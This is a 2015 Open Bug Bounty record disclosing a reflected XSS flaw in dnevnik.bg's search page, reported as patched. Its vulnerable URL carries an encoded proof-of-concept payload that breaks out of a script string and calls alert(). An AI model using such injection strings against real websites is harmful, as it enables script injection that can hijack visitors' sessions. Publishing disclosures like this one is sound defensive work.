dnevnik.bg XSS vulnerability

2015-10-31T02:32:00
ID OBB:98406
Type openbugbounty
Reporter P4r4Bellum
Modified 2015-10-31T02:35:00

Description

Vulnerable URL:
http://www.dnevnik.bg/search.php?stext=\%27]%29%3Balert%28%2FXSSPOSED%2F%29%2F%2F&rubrid=0&searchinto=0&sort=0&fromdate=%D0%9E%D1%82+%D0%B4%D0%B0%D1%82%D0%B0&todate=%D0%94%D0%BE+%D0%B4%D0%B0%D1%82%D0%B0&tAction=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5&backurl=&selfurl=&kfor_name=ssearch
Details:

Description| Value
---|---
Patched:| Yes, at 21.11.2015
Latest check for patch:| 21.11.2015 03:04 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 15675
Google Pagerank| 7
VIP website status:| Yes
Check dnevnik.bg SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 31 October, 2015 02:32 GMT
Vulnerability existence verified and confirmed| 31 October, 2015 02:35 GMT